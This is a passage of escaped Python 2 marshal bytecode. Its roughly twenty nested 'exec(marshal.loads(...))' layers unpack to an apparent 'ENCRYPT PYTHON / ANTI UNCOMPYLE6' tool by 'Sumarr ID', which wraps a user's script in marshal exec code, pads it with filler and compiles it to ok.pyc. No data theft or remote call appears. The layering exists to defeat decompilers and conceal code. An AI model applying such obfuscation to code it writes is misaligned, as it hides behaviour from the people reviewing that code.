1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x1f&\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xb6$\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NsM#\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xe4!\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns{ \x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x12\x1f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xa9\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns@\x1c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xd7\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Nsn\x19\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x05\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x9c\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns3\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xca\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Nsa\x12\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xf8\x10\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x8f\x0f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns&\x0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xbd\x0c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NsT\x0b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xeb\t\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x82\x08\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x19\x07\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xb0\x05\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NsG\x04\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x17\x01\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x02\x00GHd\x03\x00GHe\x04\x00d\x04\x00\x83\x01\x00Z\x05\x00e\x06\x00e\x05\x00\x83\x01\x00j\x07\x00\x83\x00\x00Z\x08\x00e\x06\x00d\x05\x00d\x06\x00\x83\x02\x00Z\t\x00e\t\x00j\n\x00d\x07\x00\x83\x01\x00\x01x!\x00e\x0b\x00d\x08\x00\x83\x01\x00D]\x13\x00Z\x0c\x00e\t\x00j\n\x00d\t\x00\x83\x01\x00\x01q\x81\x00We\t\x00j\n\x00d\n\x00\x83\x01\x00\x01e\r\x00e\x08\x00d\x0b\x00d\x0c\x00\x83\x03\x00Z\x05\x00e\x03\x00j\x0e\x00e\x05\x00\x83\x01\x00Z\x0f\x00e\x10\x00e\x0f\x00\x83\x01\x00Z\x11\x00e\t\x00j\n\x00d\r\x00e\x11\x00\x17d\x0e\x00\x17\x83\x01\x00\x01e\t\x00j\x12\x00\x83\x00\x00\x01e\x02\x00j\r\x00d\x05\x00d\x0f\x00\x83\x02\x00\x01e\x00\x00j\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00GHd\x01\x00S(\x12\x00\x00\x00i\xff\xff\xff\xffNs\xb6\x00\x00\x00==========================================\n# ENCRYPT PYTHON\n# ANTI UNCOMPYLE6\n\n# author : Sumarr ID\n# gitlab : https://gitlab.com/Sumarr-ID\n==========================================s\x1f\x00\x00\x00contoh : /sdcard/Download/sc.pys\x08\x00\x00\x00# file: s\x05\x00\x00\x00au.pyt\x01\x00\x00\x00ws\x11\x00\x00\x00astaghfirullah=(\ni\xdf\xf3\x00\x00sE\x00\x00\x00"astaghfirullah","astaghfirullah","astaghfirullah","astaghfirullah",\ns\x02\x00\x00\x00)\nt\x06\x00\x00\x00Sumarrt\x04\x00\x00\x00execsK\x00\x00\x00# Encrypt by Sumarr ID\n# RECODE_BERKELAS\nimport marshal\nexec(marshal.loads(s\x02\x00\x00\x00))s\x06\x00\x00\x00ok.pycs\x08\x00\x00\x00rm au.pys\x0f\x00\x00\x00# hasil: ok.pyc(\x14\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\n\x00\x00\x00py_compilet\x07\x00\x00\x00marshalt\t\x00\x00\x00raw_inputt\x01\x00\x00\x00at\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x01\x00\x00\x00bt\x01\x00\x00\x00yt\x05\x00\x00\x00writet\x05\x00\x00\x00ranget\x01\x00\x00\x00it\x07\x00\x00\x00compilet\x05\x00\x00\x00dumpst\x01\x00\x00\x00mt\x04\x00\x00\x00reprt\x01\x00\x00\x00st\x05\x00\x00\x00closet\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x01\x00\x00\x00s"\x00\x00\x000\x08\x05\x01\x05\x01\x0c\x01\x12\x01\x0f\x01\r\x01\x13\x01\x11\x01\r\x01\x12\x01\x0f\x01\x0c\x01\x15\x01\n\x01\x10\x01\r\x01(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00